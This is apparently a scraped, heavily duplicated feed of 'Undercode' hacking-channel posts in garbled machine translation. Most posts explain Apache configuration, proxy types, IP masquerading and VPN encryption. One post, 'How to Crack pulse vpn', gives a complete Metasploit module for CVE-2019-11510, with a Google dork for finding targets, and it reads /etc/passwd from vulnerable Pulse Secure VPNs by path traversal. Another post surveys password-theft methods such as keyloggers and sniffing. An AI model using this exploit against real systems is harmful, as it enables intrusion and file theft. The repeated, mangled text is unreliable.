2) Bindaddress 127.0.0.1, this option means to bind your own IP address. If you are a stand-alone, this is your IP address; if your machine is online, then Bindaddress is followed by your IP address (I wasted a lot of time because I did not change the IP address here to my own IP address ).
Servername localhost, this option is the domain name of your machine
3) If you are a stand-alone, the domain name is localhost; if you are connected to the Internet, you should connect the domain name behind Servername, if not, then connect your own IP address.
Port 80, this option is to indicate the port the server is listening on, generally defaults to 80, and can be changed to 80 or 8080.
4) ScriptAlias ββ/ php4 / \ "C: / php4 / \"
AddType application / x-httpd-php4 .php
AddType application / x-httpd-php4 .php3
AddType application / x-httpd-php4 .php4
Action application / x-httpd- php4 \ "/ php4 / php.exe \" The
above options allow your Apache to support PHP4.
About the default startup document: Apache's default startup document is index.html DirectoryIndex index.html Change it to the default startup document you want. Want to support more documents like this:
DirectoryIndex index.htm
DirectoryIndex index.php
DirectoryIndex index.php3
DirectoryIndex index.php4
> Well, with these options APACHE should basically be able to run normally!
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CREATE YOUR OWN HOST FILE :
Interpretation of apache configuration file http.conf by Undercode :
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) interpretation apache configuration file http.conf
recently wanted to do with their own server machines, because I know enough about the contents of http.conf, as well as their own path detours. Now explain the meaning of several options that need to be modified frequently in this file,
2) Bindaddress 127.0.0.1, this option means to bind your own IP address. If you are a stand-alone, this is your IP address; if your machine is online, then Bindaddress is followed by your IP address (I wasted a lot of time because I did not change the IP address here to my own IP address ).
Servername localhost, this option is the domain name of your machine
3) If you are a stand-alone, the domain name is localhost; if you are connected to the Internet, you should connect the domain name behind Servername, if not, then connect your own IP address.
Port 80, this option is to indicate the port the server is listening on, generally defaults to 80, and can be changed to 80 or 8080.
4) ScriptAlias ββ/ php4 / \ "C: / php4 / \"
AddType application / x-httpd-php4 .php
AddType application / x-httpd-php4 .php3
AddType application / x-httpd-php4 .php4
Action application / x-httpd- php4 \ "/ php4 / php.exe \" The
above options allow your Apache to support PHP4.
About the default startup document: Apache's default startup document is index.html DirectoryIndex index.html Change it to the default startup document you want. Want to support more documents like this:
DirectoryIndex index.htm
DirectoryIndex index.php
DirectoryIndex index.php3
DirectoryIndex index.php4
> Well, with these options APACHE should basically be able to run normally!
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Traditional proxy, transparent proxy, plug-gw, Apache reverse proxy, IP disguiseThe first part of the characteristics of various proxy methods and package rewriting process Full by Undercode
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Squid traditional proxy and transparent proxy: The
most widely used traditional proxy and transparent proxy on Linux is Squid. The default Squid is configured as a traditional proxy.
In this way, the windows client has to set the proxy server address and port number in the browser, and the client has
very little work to do . You only need to specify the IP address and port number of the proxy server, and everything else is left to the proxy server
to do. An obvious feature in this way is that when a Windows client browses a webpage and enters a URL, the DNS is also done by the proxy
server.
2) The DNS resolution process is based on the resolution order in the /etc/host.conf file set in the Linux server.
The general order is to find / etc / hosts first, then find the DNS database bind. An interesting example in this case is that if you set the
domain name of a site as a server in your intranet, then go to the intranet server first.
3) If you set
192.168.11.3 www.yahoo.com, it is impossible for your browser to access the yahoo site on the Internet.
But if you set up a transparent proxy, the DNS order of resolution will become
windowshosts and then the DNS database of Linux. It is no longer possible to check the / etc / hosts file on the Linux server.
For the introduction of transparent proxy, see another article in the article collection "How to set up a transparent proxy in Linux"
4) The package rewriting process of traditional proxy and transparent proxy: see the following :
[PC] A [Linux squid server] B
192.168.11.12_ | _____ 192.168.11.5 | ___ 1.2.3.4 _________ Internet
π¦ Set the proxy to 192.168.11.5 and the port number to 3128 on the browser of the user of machine A, and use B to access the Internet.
If you visit www.linuxforum.net, in fact, as long as you set up a proxy, the user's browser only
6) communicates with the Linux Squid server and never talks to the www.linuxforum.net server on the Internet. The Squid proxy server first
www.linuxforum.net for parsing (find the parsing sequence in /etc/host.conf, first / etc / hosts and then DNS lookup)
to the IP address 202.106.124.185, and finally the proxy server replaces the IP address for the client For HTTP access, the returned
information is first cached in the Squid cache, and a copy is also copied to the client. If the user or another user visits the same page next time,
it can be saved from the Squid cache.
π¦ The process of transparent proxy is similar to traditional proxy, the difference is
1) The DNS resolution process is different, as already mentioned
2) The transparent proxy gateway must be set to the IP address of the Squid proxy server, which is not required for traditional proxy.
3) The transparent proxy needs to set the input rules of the fire chain. The
rest is the same as the traditional proxy method of Squid.
plug-gw:
plug-gw is a general agent program included in FWTK. Can be used to proxy application layer services like POP3, HTTP, etc.
[PC] A [Linux POP3] C [Linux plug-gw] B
192.168.11.12_ | ______ | 192.168.11.1 ____ 192.168.11.5 | ___ 1.2.3.4__Internet
π¦ If there is a Linux on the internal network segment POP3 server C (192.168.11.1), the user can wish to receive an external message
may be set in the plug-gw POP3 proxy machine B as follows:
1) place the following line to /etc/rc.d/rc.local
/ usr / local / etc / plug-gw -daemon 1.2.3.4:110 -name plug-gw-pop3 &
file / usr / local / etc / netperm-table has the following line
plug-gw-pop3: port 110 * -plug-to 192.168. 11.1 -port 110
π¦ Traditional proxy, transparent proxy, plug-gw, Apache reverse proxy, IP disguiseThe first part of the characteristics of various proxy methods and package rewriting process Full by Undercode
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Squid traditional proxy and transparent proxy: The
most widely used traditional proxy and transparent proxy on Linux is Squid. The default Squid is configured as a traditional proxy.
In this way, the windows client has to set the proxy server address and port number in the browser, and the client has
very little work to do . You only need to specify the IP address and port number of the proxy server, and everything else is left to the proxy server
to do. An obvious feature in this way is that when a Windows client browses a webpage and enters a URL, the DNS is also done by the proxy
server.
2) The DNS resolution process is based on the resolution order in the /etc/host.conf file set in the Linux server.
The general order is to find / etc / hosts first, then find the DNS database bind. An interesting example in this case is that if you set the
domain name of a site as a server in your intranet, then go to the intranet server first.
3) If you set
192.168.11.3 www.yahoo.com, it is impossible for your browser to access the yahoo site on the Internet.
But if you set up a transparent proxy, the DNS order of resolution will become
windowshosts and then the DNS database of Linux. It is no longer possible to check the / etc / hosts file on the Linux server.
For the introduction of transparent proxy, see another article in the article collection "How to set up a transparent proxy in Linux"
4) The package rewriting process of traditional proxy and transparent proxy: see the following :
[PC] A [Linux squid server] B
192.168.11.12_ | _____ 192.168.11.5 | ___ 1.2.3.4 _________ Internet
π¦ Set the proxy to 192.168.11.5 and the port number to 3128 on the browser of the user of machine A, and use B to access the Internet.
If you visit www.linuxforum.net, in fact, as long as you set up a proxy, the user's browser only
6) communicates with the Linux Squid server and never talks to the www.linuxforum.net server on the Internet. The Squid proxy server first
www.linuxforum.net for parsing (find the parsing sequence in /etc/host.conf, first / etc / hosts and then DNS lookup)
to the IP address 202.106.124.185, and finally the proxy server replaces the IP address for the client For HTTP access, the returned
information is first cached in the Squid cache, and a copy is also copied to the client. If the user or another user visits the same page next time,
it can be saved from the Squid cache.
π¦ The process of transparent proxy is similar to traditional proxy, the difference is
1) The DNS resolution process is different, as already mentioned
2) The transparent proxy gateway must be set to the IP address of the Squid proxy server, which is not required for traditional proxy.
3) The transparent proxy needs to set the input rules of the fire chain. The
rest is the same as the traditional proxy method of Squid.
plug-gw:
plug-gw is a general agent program included in FWTK. Can be used to proxy application layer services like POP3, HTTP, etc.
[PC] A [Linux POP3] C [Linux plug-gw] B
192.168.11.12_ | ______ | 192.168.11.1 ____ 192.168.11.5 | ___ 1.2.3.4__Internet
π¦ If there is a Linux on the internal network segment POP3 server C (192.168.11.1), the user can wish to receive an external message
may be set in the plug-gw POP3 proxy machine B as follows:
1) place the following line to /etc/rc.d/rc.local
/ usr / local / etc / plug-gw -daemon 1.2.3.4:110 -name plug-gw-pop3 &
file / usr / local / etc / netperm-table has the following line
plug-gw-pop3: port 110 * -plug-to 192.168. 11.1 -port 110
2) the user sets the POP3 server address in outlook express to 1.2.3.4. When receiving mail, the external
interface of the B machine is to accept the user request on the 110 port of 1.2.3.4, and then it is plug-gw Processing, on the internal network segment,
192.168.11.5 sends a request to port 110 of 192.168.11.1. Copy the obtained data to
external users through the 1.2.3.4 interface .
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
interface of the B machine is to accept the user request on the 110 port of 1.2.3.4, and then it is plug-gw Processing, on the internal network segment,
192.168.11.5 sends a request to port 110 of 192.168.11.1. Copy the obtained data to
external users through the 1.2.3.4 interface .
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Apache reverse proxy clearn your doubt forEver by undercode
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
The package rewriting process is similar to plug-gw.
1) Note: In the above three cases, the request process is divided twice, and the middle is usually the Squid proxy server or
Plug-gw, Apache server, the data is copied between the two network cards of the server, but
2) the source address of the two request processes is a randomly assigned high-end address, which is different. Between 1024 and 65535. But generally speaking,
the random high-end addresses allocated by TCP / IP are mostly allocated between 1024-5000. For example: For plug-gw:
If the IP address of an external dial-up user is 5.6.7.8 If the address and port are as follows: the
source address and port number and the destination address port
sum are: 5.6.7.8 1038 1.2.3.4 110
rewritten by plug-gw request:
192.168.11.5 1045 192.168.11.1 110
3) The data returned by 192.168.11.1 Copy to external customers.
However, not all the randomly assigned addresses on the high end of the source are between 1024 and 5000. IP masquerading is the exception:
π¦ IP masquerading:
[PC] A [Linux MASQ server] B
192.168.11.12_ | _____ 192.168.11.5 | ___ 1.2.3.4 _________ Internet
4) PC A is going to surf the Internet through B masquerading. If you want to visit www.linuxforum.net, the package rewriting process in disguise is as follows:
source address / port number and destination address / port number are:
192.168.11.12 1047 202.106.124.185 80
5) The
source address and port number and The target address / port number is:
1.2.3.4 62334 202.106.124.185 80 The
returned packet is
202.106.124.185 80-1.2.3.4 62334
and then rewritten to PC A as:
202.106.124.185 80-192.168.11.12 1047
6) Generally speaking, the IP masquerade The source address is usually> 60,000 and is between 61000--64999.
A comparison table of IP disguise is maintained on the firewall. You can see with the command / sbin / ipchains -M -L -n
:
[root @ proxy etc] # / sbin / ipchains -M -L -n
IP masquerading entries
prot expire source destination ports
UDP 02: 18.86 192.168.11.12 205.188 .179.41 1215 (62615)-> 4000
TCP 17: 03.20 192.168.11.12 205.188.248.57 1049 (62584)-> 80
7) From the ports column you can compare the matching of two source addresses.
Port forwarding (port forwarding):
See another article in the article collection "Using Port Forwarding to Provide Network Services Externally from the Intranet"
π¦ Apache reverse proxy clearn your doubt forEver by undercode
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
The package rewriting process is similar to plug-gw.
1) Note: In the above three cases, the request process is divided twice, and the middle is usually the Squid proxy server or
Plug-gw, Apache server, the data is copied between the two network cards of the server, but
2) the source address of the two request processes is a randomly assigned high-end address, which is different. Between 1024 and 65535. But generally speaking,
the random high-end addresses allocated by TCP / IP are mostly allocated between 1024-5000. For example: For plug-gw:
If the IP address of an external dial-up user is 5.6.7.8 If the address and port are as follows: the
source address and port number and the destination address port
sum are: 5.6.7.8 1038 1.2.3.4 110
rewritten by plug-gw request:
192.168.11.5 1045 192.168.11.1 110
3) The data returned by 192.168.11.1 Copy to external customers.
However, not all the randomly assigned addresses on the high end of the source are between 1024 and 5000. IP masquerading is the exception:
π¦ IP masquerading:
[PC] A [Linux MASQ server] B
192.168.11.12_ | _____ 192.168.11.5 | ___ 1.2.3.4 _________ Internet
4) PC A is going to surf the Internet through B masquerading. If you want to visit www.linuxforum.net, the package rewriting process in disguise is as follows:
source address / port number and destination address / port number are:
192.168.11.12 1047 202.106.124.185 80
5) The
source address and port number and The target address / port number is:
1.2.3.4 62334 202.106.124.185 80 The
returned packet is
202.106.124.185 80-1.2.3.4 62334
and then rewritten to PC A as:
202.106.124.185 80-192.168.11.12 1047
6) Generally speaking, the IP masquerade The source address is usually> 60,000 and is between 61000--64999.
A comparison table of IP disguise is maintained on the firewall. You can see with the command / sbin / ipchains -M -L -n
:
[root @ proxy etc] # / sbin / ipchains -M -L -n
IP masquerading entries
prot expire source destination ports
UDP 02: 18.86 192.168.11.12 205.188 .179.41 1215 (62615)-> 4000
TCP 17: 03.20 192.168.11.12 205.188.248.57 1049 (62584)-> 80
7) From the ports column you can compare the matching of two source addresses.
Port forwarding (port forwarding):
See another article in the article collection "Using Port Forwarding to Provide Network Services Externally from the Intranet"
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦To be 100% Be anounymously on net you must know this
> Application and Advantages and Disadvantages of
Various Agent Methods The role of various agent methods by Undercode
π¦ ππΌππ πππΈβπ :
1) IP Disguised, Squid's traditional proxy and transparent proxy are suitable for users with no real IP address on the LAN to access the Internet.
2) Apache reverse proxy, plug-gw general proxy, port forwarding is suitable for external users to access
the server without real IP address in the LAN .
π¦ The advantages and disadvantages of various proxy methods:
1) The advantage of Squid is that it requires few clients, as long as it can connect to the Squid server.
However, it is necessary to set the proxy server IP address and port number for each machine.
3) The advantage of Squid transparent proxy is that it does not require each client to set the proxy address and port, simplifying the client
configuration. However, the default gateway of each client needs to be set to the Squid proxy server, and the client needs to do
DNS resolution
4) IP masquerading can be suitable for most application layer services, unlike Squid which only supports http and ftp. But also requires the client βs The default
gateway is set to the address of the firewall. And unlike Squid has a cache function plug-gw can proxy various servers like HTTP, POP3, etc. But Apache reverse proxy can only proxy http reverse request
5) Port forwarding is suitable for most services. It has nothing to do with the specific application. It is fast and implemented at the core IP layer without requiring special
application layer services to run. But it may be necessary to recompile the kernel.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦To be 100% Be anounymously on net you must know this
> Application and Advantages and Disadvantages of
Various Agent Methods The role of various agent methods by Undercode
π¦ ππΌππ πππΈβπ :
1) IP Disguised, Squid's traditional proxy and transparent proxy are suitable for users with no real IP address on the LAN to access the Internet.
2) Apache reverse proxy, plug-gw general proxy, port forwarding is suitable for external users to access
the server without real IP address in the LAN .
π¦ The advantages and disadvantages of various proxy methods:
1) The advantage of Squid is that it requires few clients, as long as it can connect to the Squid server.
However, it is necessary to set the proxy server IP address and port number for each machine.
3) The advantage of Squid transparent proxy is that it does not require each client to set the proxy address and port, simplifying the client
configuration. However, the default gateway of each client needs to be set to the Squid proxy server, and the client needs to do
DNS resolution
4) IP masquerading can be suitable for most application layer services, unlike Squid which only supports http and ftp. But also requires the client βs The default
gateway is set to the address of the firewall. And unlike Squid has a cache function plug-gw can proxy various servers like HTTP, POP3, etc. But Apache reverse proxy can only proxy http reverse request
5) Port forwarding is suitable for most services. It has nothing to do with the specific application. It is fast and implemented at the core IP layer without requiring special
application layer services to run. But it may be necessary to recompile the kernel.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How does VPN encryption work by undercode ?
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) A VPN protocol is a set of rules for transmitting and encrypting data. Most VPN services provide their customers with a choice of several VPN protocols, among which the most common are: Point to Point Tunneling Protocol (PPTP), Layer Two Tunnelling Protocol (L2TP), Internet Protocol Security (IPSec) and OpenVPN (SSL / TLS )
2) We cannot explain how VPN services protect user privacy without talking about encryption. VPN services use a special data processing method (encryption) to make read data (plain text) completely unreadable (encrypted text) for any person who can intercept them . An algorithm (cipher) determines exactly how data is encrypted and decrypted within the framework of a particular VPN protocol. VPN protocols use these cryptographic algorithms to encrypt your data and keep it private.
3) Each of these VPN protocols has its own strengths and weaknesses, depending on the corresponding cryptographic algorithm. Some VPN services allow users to choose one of the available ciphers themselves. Three types of ciphers are distinguished: symmetric, asymmetric and hashing.
4) Symmetric encryption uses a single key for both encryption and data decryption. Asymmetric encryption uses two keys: one for encryption, the other for decryption. The table below compares these types of encryption.
5) Asymmetric cryptography comes to the rescue in those cases where it is necessary to overcome the limitations inherent in symmetric cryptography (as shown in the table above). Whitfield Diffie and Martin Hellman were part of the first research group to work on improving symmetric encryption, and it was they who developed the asymmetric encryption algorithm
6) This is a popular cryptographic algorithm that underlies many VPN protocols, including those based on HTTPS, SSH, IPsec, and OpenVPN. Using this algorithm, two parties that have never met each other before can discuss a private key even in cases when communication is conducted through an unsecured public network (for example, the Internet).
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How does VPN encryption work by undercode ?
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) A VPN protocol is a set of rules for transmitting and encrypting data. Most VPN services provide their customers with a choice of several VPN protocols, among which the most common are: Point to Point Tunneling Protocol (PPTP), Layer Two Tunnelling Protocol (L2TP), Internet Protocol Security (IPSec) and OpenVPN (SSL / TLS )
2) We cannot explain how VPN services protect user privacy without talking about encryption. VPN services use a special data processing method (encryption) to make read data (plain text) completely unreadable (encrypted text) for any person who can intercept them . An algorithm (cipher) determines exactly how data is encrypted and decrypted within the framework of a particular VPN protocol. VPN protocols use these cryptographic algorithms to encrypt your data and keep it private.
3) Each of these VPN protocols has its own strengths and weaknesses, depending on the corresponding cryptographic algorithm. Some VPN services allow users to choose one of the available ciphers themselves. Three types of ciphers are distinguished: symmetric, asymmetric and hashing.
4) Symmetric encryption uses a single key for both encryption and data decryption. Asymmetric encryption uses two keys: one for encryption, the other for decryption. The table below compares these types of encryption.
5) Asymmetric cryptography comes to the rescue in those cases where it is necessary to overcome the limitations inherent in symmetric cryptography (as shown in the table above). Whitfield Diffie and Martin Hellman were part of the first research group to work on improving symmetric encryption, and it was they who developed the asymmetric encryption algorithm
6) This is a popular cryptographic algorithm that underlies many VPN protocols, including those based on HTTPS, SSH, IPsec, and OpenVPN. Using this algorithm, two parties that have never met each other before can discuss a private key even in cases when communication is conducted through an unsecured public network (for example, the Internet).
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Crack pulse vpn Lastest CVE-Tested by UNDERCODE ?
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) LOAD THIS SHELL VIA METASPLOITE :
disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
> # Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Post::File
def initialize(info = {})
super(update_info(info,
'Name' => 'Pulse Secure - System file leak',
'Description' => %q{
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
},
'References' =>
[
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
],
'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
},
))
end
def run()
print_good("Checking target...")
res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)
if res && res.code == 200
print_good("Target is Vulnerable!")
data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)
file_local_write(filename, data)
print_good("Parsing file.......")
parse()
else
if(res && res.code == 404)
print_error("Target not Vulnerable")
else
print_error("Ooof, try again...")
end
end
end
def parse()
current_host = datastore['RHOST']
fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
words = 0
while (line = fileObj.gets)
printable_data = line.gsub(/[^[:print:]]/, '.')
array_data = printable_data.scan(/.{1,60}/m)
for ar in array_data
if ar != "............................................................"
print_good(ar)
end
end
#print_good(printable_data)
end
fileObj.close
end
end
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Crack pulse vpn Lastest CVE-Tested by UNDERCODE ?
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) LOAD THIS SHELL VIA METASPLOITE :
disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
> # Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Post::File
def initialize(info = {})
super(update_info(info,
'Name' => 'Pulse Secure - System file leak',
'Description' => %q{
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
},
'References' =>
[
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
],
'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
},
))
end
def run()
print_good("Checking target...")
res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)
if res && res.code == 200
print_good("Target is Vulnerable!")
data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)
file_local_write(filename, data)
print_good("Parsing file.......")
parse()
else
if(res && res.code == 404)
print_error("Target not Vulnerable")
else
print_error("Ooof, try again...")
end
end
end
def parse()
current_host = datastore['RHOST']
fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
words = 0
while (line = fileObj.gets)
printable_data = line.gsub(/[^[:print:]]/, '.')
array_data = printable_data.scan(/.{1,60}/m)
for ar in array_data
if ar != "............................................................"
print_good(ar)
end
end
#print_good(printable_data)
end
fileObj.close
end
end
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ common methods for cracking network passwords
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) Brute force
The most basic of password cracking technology is brute force cracking, also called password exhaustion. If the hacker knows the account number in advance, such as mail account, QQ user account, online banking account, etc., and the user's password is set very simple, such as using a simple combination of numbers, the hacker can quickly crack the password using a brute force tool Come. Therefore, users should try to set the password more complicated.
2) Keystroke record
If the user's password is more complicated, it is difficult to use brute force to crack. At this time, hackers often install Trojan viruses to users, design "keystroke recording" programs, record and monitor users' keystroke operations, and then through various methods. The recorded user keystroke content is transmitted to the hacker, so that the hacker can crack the user's password by analyzing the user keystroke information.
3) Screen recording
In order to prevent the keystroke recording tool, there is a way to enter the password using the mouse and the picture. At this time, the hacker can take a screenshot of the user's screen through the Trojan program and then record the position of the mouse click, and record the position of the mouse to compare the screenshot of the screenshot, thus cracking this kind of Method user password.
4) Phishing
"Phishing" attacks use fraudulent emails and forged websites to log in to fraudulent activities, and the scammers often leak their sensitive information (such as user name, password, account number, PIN code or credit card details), phishing Mainly by sending e-mails to lure users to log in to fake online banking and online securities websites, to defraud users' account passwords for theft.
5) Sniffer (sniffer)
On a local area network, if a hacker wants to quickly obtain a large number of accounts (including user name and password), the most effective method is to use the Sniffer program. Sniffer, Chinese translation for sniffer, is a very threatening passive attack tool. Using this tool, you can monitor the status of the network, the flow of data, and the information transmitted on the network. When the information is transmitted on the network in the form of plain text, you can use the network monitoring method to steal the transmitted data packets on the network. By setting the network interface to monitor mode, you can intercept the continuous information transmitted on the Internet. Any data packets directly transmitted through HTTP, FTP, POP, SMTP, TELNET protocols will be monitored by the Sniffer program.
6) Password Reminder
For some local passwords saved in asterisks, you can use tools like Password Reminder to crack them. Drag and drop the magnifying glass in Password Reminder onto the asterisks to crack the password.
7) Remote control
Use the remote control Trojan to monitor all operations of the user's local computer. Any keyboard and mouse operations of the user will be intercepted by the remote hacker.
8) Bad habits
Some employees of the company set a long password, but they wrote the password on paper. Others used their names or their birthdays as passwords, and others used commonly used words as passwords. These bad habits will lead to Passwords can be easily cracked.
9) Analytical reasoning
If a user uses multiple systems, a hacker can first crack the user password of a simpler system, and then use the cracked password to calculate the user password of other systems. For example, many users use the same password for all systems.
10) Password Psychology
π¦ common methods for cracking network passwords
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) Brute force
The most basic of password cracking technology is brute force cracking, also called password exhaustion. If the hacker knows the account number in advance, such as mail account, QQ user account, online banking account, etc., and the user's password is set very simple, such as using a simple combination of numbers, the hacker can quickly crack the password using a brute force tool Come. Therefore, users should try to set the password more complicated.
2) Keystroke record
If the user's password is more complicated, it is difficult to use brute force to crack. At this time, hackers often install Trojan viruses to users, design "keystroke recording" programs, record and monitor users' keystroke operations, and then through various methods. The recorded user keystroke content is transmitted to the hacker, so that the hacker can crack the user's password by analyzing the user keystroke information.
3) Screen recording
In order to prevent the keystroke recording tool, there is a way to enter the password using the mouse and the picture. At this time, the hacker can take a screenshot of the user's screen through the Trojan program and then record the position of the mouse click, and record the position of the mouse to compare the screenshot of the screenshot, thus cracking this kind of Method user password.
4) Phishing
"Phishing" attacks use fraudulent emails and forged websites to log in to fraudulent activities, and the scammers often leak their sensitive information (such as user name, password, account number, PIN code or credit card details), phishing Mainly by sending e-mails to lure users to log in to fake online banking and online securities websites, to defraud users' account passwords for theft.
5) Sniffer (sniffer)
On a local area network, if a hacker wants to quickly obtain a large number of accounts (including user name and password), the most effective method is to use the Sniffer program. Sniffer, Chinese translation for sniffer, is a very threatening passive attack tool. Using this tool, you can monitor the status of the network, the flow of data, and the information transmitted on the network. When the information is transmitted on the network in the form of plain text, you can use the network monitoring method to steal the transmitted data packets on the network. By setting the network interface to monitor mode, you can intercept the continuous information transmitted on the Internet. Any data packets directly transmitted through HTTP, FTP, POP, SMTP, TELNET protocols will be monitored by the Sniffer program.
6) Password Reminder
For some local passwords saved in asterisks, you can use tools like Password Reminder to crack them. Drag and drop the magnifying glass in Password Reminder onto the asterisks to crack the password.
7) Remote control
Use the remote control Trojan to monitor all operations of the user's local computer. Any keyboard and mouse operations of the user will be intercepted by the remote hacker.
8) Bad habits
Some employees of the company set a long password, but they wrote the password on paper. Others used their names or their birthdays as passwords, and others used commonly used words as passwords. These bad habits will lead to Passwords can be easily cracked.
9) Analytical reasoning
If a user uses multiple systems, a hacker can first crack the user password of a simpler system, and then use the cracked password to calculate the user password of other systems. For example, many users use the same password for all systems.
10) Password Psychology